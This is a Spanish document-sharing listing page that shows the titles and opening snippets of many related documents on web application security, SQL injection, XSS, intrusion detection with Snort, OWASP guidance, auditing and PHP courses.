SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática. SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

Securiza tu red con Snort y sus amigos

Securiza tu red con Snort y sus amigos www.securityartwork.es www.s2grupo.es Securiza tu red con Snort y sus amigos José Luis Chica Uribe Técnico de seguridad IT jchica@s2grupo.es Índice Seguridad: conceptos Tipos de ataques Cómo defenderse?

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA

UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA ESCUELA DE CIENCIAS BASICAS TECNONOLOGIA E INGENIERIA INTRODUCCIÓN A LA SEGURIDAD EN REDES MAG. ELEONORA PALTA VELASCO (Director Nacional) ZONA CENTRO-SUR (CEAD

Más detalles

Seguretat en xarxes. Tallafocs, IDS, IPS, filtrat de continguts

Seguretat en xarxes. Tallafocs, IDS, IPS, filtrat de continguts Seguretat en xarxes. Tallafocs, IDS, IPS, filtrat de continguts Índice de contenido Seguretat en xarxes. Tallafocs, IDS, IPS, filtrat de continguts...1 Licencia...1 Cortafuegos...1 Sin estado...2 Con estado

Más detalles

Intrusion Detection/Prevention Systems SNORT.

Intrusion Detection/Prevention Systems SNORT. Intrusion Detection/Prevention Systems SNORT. Miguel Angel Rodriguez Yamid Armando Pantoja Juan Carlos Pantoja Universidad de Nariño Facultad de Ingeniería Programa Ingeniería de Sistemas 11 de diciembre

Más detalles

Capítulo 5: PRUEBAS.

Capítulo 5: PRUEBAS. Capítulo 5: PRUEBAS. 5.1 Objetivos de las pruebas. Objetivos de las pruebas. Hoy en día el tema de la seguridad en software ya no resulta nada nuevo, en los inicios los desarrolladores de software no procuraban

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

Aplicaciones Web (Curso 2015/2016)

Aplicaciones Web (Curso 2015/2016) Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

About Me. Mario Robles Tencio

About Me. Mario Robles Tencio About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)

Más detalles

Seguridad en el ciclo de vida del desarrollo de software

Seguridad en el ciclo de vida del desarrollo de software Seguridad en el ciclo de vida del desarrollo de software Lic. Pablo Milano 12 de Septiembre de 2007 Buenos Aires - Argentina Introducción Introducción n a la seguridad en el SDLC Actualmente

Más detalles

Testing de Seguridad de Aplicaciones Web

Testing de Seguridad de Aplicaciones Web Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. jardita@cybsec.com 16 de Noviembre de 2013 Coatzacoalcos - MEXICO Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Semana 3: Con Con r t o r l de Acceso

Semana 3: Con Con r t o r l de Acceso Semana 3: Control de Acceso Intrusiones Aprendizajes esperados Contenidos: Verificación de la seguridad Detección de Intrusiones Métodos de ataque Qué es una INTRUSIÓN? Vamos a dfii definir INTRUSIÓN como

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Ecyware GreenBlue Inspector

Ecyware GreenBlue Inspector Ecyware GreenBlue Inspector Guía de usuario Versión 1.0 Copyright Ecyware Solutions. All rights reserved, Ecyware 2003-2004. Tabla de contenido TABLA DE CONTENIDO 2 INTRODUCCIÓN 4 CARACTERÍSTICAS 5 ECYWARE

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del

Más detalles

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

Servicio de Protección Total Web

Servicio de Protección Total Web Servicio de Protección Total Web Prevención de Fraude Inspecciones de Procesos, Tecnología, Personas y Lugares, Ethical hacking, Concientización y Capacitación en Seguridad Detección de Fraude Ambientes

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Servicios de Seguridad de la Información

Servicios de Seguridad de la Información Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos

Más detalles

LOGO. Modulo 2. Carlos Villanueva

LOGO. Modulo 2. Carlos Villanueva SSO5501 Hardening de un Sistema Operativo de Red LOGO Modulo 2 Carlos Villanueva Introduccion Hardering, del ingles Endurecimiento, se refiere al proceso de segurizar un Sistema o Aplicación Objetivos

Más detalles

CURSO DE PROGRAMACIÓN PHP MySQL

CURSO DE PROGRAMACIÓN PHP MySQL CURSO DE PROGRAMACIÓN PHP MySQL MASTER EN PHP MÓDULO NIVEL BASICO PRIMER MES Aprende a crear Sitios Web Dinámicos con PHP y MySQL 1. Introducción Qué es PHP? Historia Por qué PHP? Temas de instalación

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS

CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS Capítulo 2 Sistemas de Detección de Intrusos 7 CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS En este capítulo se definen los sistemas de detección de intrusos y su relación con los ataques basados en el

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

HERRAMIENTAS DE SEGURIDAD

HERRAMIENTAS DE SEGURIDAD Seguridad Informática I M.C. Cintia Quezada Reyes HERRAMIENTAS DE SEGURIDAD Siempre es conveniente instalar herramientas de seguridad y es aconsejable que éstas sean las que se consideren necesarias después

Más detalles

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L.

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L. Auditorías de Seguridad: revisión como método de prevención Vicente Aguilera Díaz Internet Security Auditors, S.L. CONTENIDO 1. Protección de la información 2. Auditorías de seguridad 3. Implantación de

Más detalles

Inseguridad de los sistemas de autenticación en aplicaciones web

Inseguridad de los sistemas de autenticación en aplicaciones web Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz vaguilera@isecauditors.com Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias

Más detalles

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos.

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. Introducción a la seguridad Web: La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. El gran problema no está en que esas páginas sean vulnerables y con ello podamos pasar un rato

Más detalles

UNIVERSIDAD TECNICA DE MANABI Facultad de Ciencias Informáticas Ingeniería en sistemas. SEGURIDAD INFORMATICA Tema: Mysql Injection

UNIVERSIDAD TECNICA DE MANABI Facultad de Ciencias Informáticas Ingeniería en sistemas. SEGURIDAD INFORMATICA Tema: Mysql Injection UNIVERSIDAD TECNICA DE MANABI Facultad de Ciencias Informáticas Ingeniería en sistemas SEGURIDAD INFORMATICA Tema: Mysql Injection Autora: Doris María Mera Mero Curso: 7mo A Fecha: Martes 30 de Julio del

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

OWASP: Un punto de vista. aplicaciones web seguras

OWASP: Un punto de vista. aplicaciones web seguras OWASP: Un punto de vista pragmático para el desarrollo de aplicaciones web seguras Armando Carvajal (armando.carvajal@globalteksecurity.com) Gerente Arquitecto Soluciones Globaltek Security Master en seguridad

Más detalles

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR

Más detalles

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Norma: Normas de Seguridad de Datos (DSS) Requisito: 6.6 Fecha: febrero de 2008 Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Fecha de publicación:

Más detalles

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es)

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es) Seguridad en Sistemas Informáticos Seguridad y WWW Mikel Izal Azcárate (mikel.izal@unavarra.es) Indice Seguridad en WWW > Seguridad en la autentificación > Seguridad en la autorización > Ataques de validación

Más detalles

INSTALACION Y CONFIGURACION DE UN NIDS (SNORT) EN UBUNTU

INSTALACION Y CONFIGURACION DE UN NIDS (SNORT) EN UBUNTU INSTALACION Y CONFIGURACION DE UN NIDS (SNORT) EN UBUNTU VIVIANA ISABEL ESPINOSA PEÑA 1150017 ANA KATERINE MONTESINOS GELVEZ 1150013 PROFESOR: JEAN POLO CEQUEDA MATERIA: SEGURIDAD INFORMATICA UNIVERSIDAD

Más detalles

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos

Más detalles

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP OBJETIVOS Estudiar la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011

Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Privacy by design (PbD). Necesidades de desarrollo seguro. Daniel de los Reyes dadecal@s2grupo.es Director de desarrollo. S2 Grupo 12 de Mayo, 2011 Antecedentes Nueva Directiva comunitaria sobre Protección

Más detalles

Introducción a ataques de tipo inyección: Inyección SQL

Introducción a ataques de tipo inyección: Inyección SQL Introducción a ataques de tipo inyección: Inyección SQL Jorge Peris Cortés - jorpecor@alumni.uv.es Asignatura: Redes Ingeniería Informática - Curso 2011/2012 Universidad de Valencia 1 Índice INTRODUCCIÓN...

Más detalles

Novedades ebd versión 3.2

Novedades ebd versión 3.2 Novedades ebd versión 3.2 En este documento se detallan los cambios más importantes realizados en la versión 3.2 de ebd. Además de estas modificaciones, se han implementado mejoras de rendimiento y corregido

Más detalles

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1 Introducción (1) Personal Home Page Qué es? Acrónimo de : Hypertext Preprocessor. Lenguaje interpretado de alto nivel que permite desarrollar fácilmente páginas dinámicas. Similar a los lenguajes C y Perl.

Más detalles

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los

Más detalles

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB OCTUBRE DE 2011 Edita: Editor y Centro Criptológico Nacional, 2011 NIPO: 076-11-053-3 Tirada: 1000 ejemplares Fecha

Más detalles

Auditoría de Seguridad

Auditoría de Seguridad Auditoría de Seguridad Introducción Tipos auditoría Externa Caja Negra Interna Caja Blanca Informes Valoración sistema Oferta y Tarificación Recursos Formación - certificaciones Auditoría de Seguridad

Más detalles

Seguridad, Web y Java

Seguridad, Web y Java 2 Seguridad, Web y Java Seguridad, Web y Java Daniel López Janáriz d.lopez@uib.es Seguridad, Web y Java 3 1. Introducción: Puntos a tener en cuenta cuando hablamos de seguridad La seguridad al 100% no

Más detalles

abacformacio@abacformacio.com

abacformacio@abacformacio.com Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

Seguridad WEB Inyección de código

Seguridad WEB Inyección de código Seguridad WEB Inyección de código Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación

Más detalles

Gestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP

Gestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP Gestión de Seguridad en canales electrónicos Ing. Jorge O Higgins, CISSP Contenido 1. Objetivos de seguridad en el ambiente financiero 2. Definición de requerimientos de seguridad 3. Seguridad como proceso

Más detalles

Manual de integración con el TPV Virtual para comercios con conexión por Redirección

Manual de integración con el TPV Virtual para comercios con conexión por Redirección Manual de integración con el TPV Virtual para comercios con conexión por Redirección Versión: 1.6 Versión: 1.6 i Autorizaciones y control de versión Versión Fecha Afecta Breve descripción del cambio 1.0

Más detalles

Tema 4: Tecnologías Web Java

Tema 4: Tecnologías Web Java Tema 4: Tecnologías Web Java Introducción Aplicación web Aplicación que corre en al menos un servidor y a la que el usuario accede desde un cliente de propósito general (ej.: navegador en un PC, teléfono

Más detalles

MAESTRO DE PHP PHP NIVEL 1

MAESTRO DE PHP PHP NIVEL 1 MAESTRO DE PHP MAESTRO DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. Incluye los Cursos PHP Nivel 1 y PHP Avanzado

Más detalles

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas Problemas más comunes y principales contramedidas Seguridad en aplicaciones web Problemas más comunes y principales contramedidas Fernando de la Villa Gerente de Soluciones Area Seguridad Mnemo Evolution

Más detalles

Offensive State Auditoría de Aplicaciones Web

Offensive State Auditoría de Aplicaciones Web Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4

Más detalles

Programación de código seguro

Programación de código seguro Programación de código seguro Distinción de vulnerabilidades Stack OverFlow y Heap OverFlow Comunes en lenguajes y aplicaciones de escritorio TOP 10 OWASP Muchas otras Stack OverFlow Stack OverFlow: Ejemplo

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos.

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Introducción...1 1 Cortafuegos Firewall-... 3 1.1 Políticas de control de acceso... 4 1.2 Órganización

Más detalles

Pentesting con OWASP Zed Attack Proxy

Pentesting con OWASP Zed Attack Proxy Pentesting con OWASP Zed Attack Proxy 1. Introducción ZAP es una poderosa herramienta para realizar ataques de penetración (disciplina conocida como Pentesting), que permite analizar sitios web para buscar

Más detalles

Introducción al desarrollo web (idesweb)

Introducción al desarrollo web (idesweb) Introducción al desarrollo web (idesweb) Práctica 8: PHP 2 (cookies y sesiones) 1. Objetivos Conocer el concepto de cookie y sus posibles usos. Aprender a utilizar las cookies con PHP. Conocer el concepto

Más detalles

Programación páginas web JavaScript y PHP

Programación páginas web JavaScript y PHP Programación páginas web JavaScript y PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

Especificaciones Técnicas para Ethical Hacking

Especificaciones Técnicas para Ethical Hacking Especificaciones Técnicas para Ethical Hacking OBJETIVO PRINCIPAL El BANCO DEL ESTADO, requiere efectuar un estudio de Ethical Hacking sobre su infraestructura, que permita identificar y corregir las vulnerabilidades

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

Seguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010

Seguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010 Seguridad en Home Banking Tendencias de la Tecnología en Seguridad Informática Argentina 2010 1 Agenda 1. Proyecto Home Banking 2. Confección de equipos de trabajo 3. Arquitectura integral de seguridad

Más detalles

Autor: Angel Alonso Párrizas Director: Santiago Felici Castell. Ingeniería informática Universitat de València

Autor: Angel Alonso Párrizas Director: Santiago Felici Castell. Ingeniería informática Universitat de València Propuesta de una arquitectura de sistemas de detección de intrusos con correlación. Autor: Angel Alonso Párrizas Director: Santiago Felici Castell Noviembre 2005 Haga clic TABLA para cambiar DE CONTENIDOS

Más detalles

CAPITULO 4 DISEÑO DEL IDS

CAPITULO 4 DISEÑO DEL IDS CAPITULO 4 DISEÑO DEL IDS En este capítulo se describe el diseño del IDS presentado para este trabajo de Tesis. Se explican las consideraciones que se tomaron para realizar el diseño del mismo sistema

Más detalles

Fuzzing y seguridad. José Miguel Esparza Muñoz Security Researcher S21sec labs. 10 de agosto de 2007

Fuzzing y seguridad. José Miguel Esparza Muñoz Security Researcher S21sec labs. 10 de agosto de 2007 Fuzzing y seguridad José Miguel Esparza Muñoz Security Researcher S21sec labs 10 de agosto de 2007 Resumen Con este artículo se pretende dar las nociones básicas para el acercamiento del lector a una de

Más detalles

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad. Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar

Más detalles

CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su

Más detalles